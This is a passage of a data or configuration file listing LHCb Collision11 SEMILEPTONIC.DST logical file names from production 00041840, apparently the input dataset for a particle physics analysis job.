'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025649_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018445_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008718_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041308_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006627_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057447_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003800_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014705_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053314_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003247_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069388_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015236_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053099_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021311_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038761_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009495_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068110_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028139_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031793_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020606_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022127_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044183_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041737_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015312_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011207_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003085_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054514_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050629_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042558_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001139_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061471_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062920_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051572_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000519_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058986_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008717_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050828_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037412_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046474_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002085_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010359_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050819_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055363_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016305_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023230_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054872_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046962_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060740_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054824_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050966_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011616_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006153_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005009_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069081_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059194_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017900_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002297_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017811_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003933_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064923_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056032_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050048_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054571_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054894_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052692_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065146_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026026_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049882_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008101_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055677_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012158_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025751_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042557_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046170_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006333_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003396_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020204_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008408_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001464_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047962_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012431_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007820_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026570_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058372_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026274_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017063_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064750_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027400_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041272_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054581_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055081_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042441_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006662_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018743_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008944_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031586_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067878_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034305_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004563_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024144_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066281_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008603_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062024_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054317_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065616_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010187_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010880_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060488_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037981_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037062_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044655_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022404_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012294_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044260_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064780_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027590_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009596_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036192_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031150_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062381_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026300_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005397_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047369_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059616_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004457_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002255_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067194_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053203_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060984_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017530_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037773_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009333_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049739_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000949_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025233_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010028_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055519_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022727_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043578_1.semileptonic.dst',
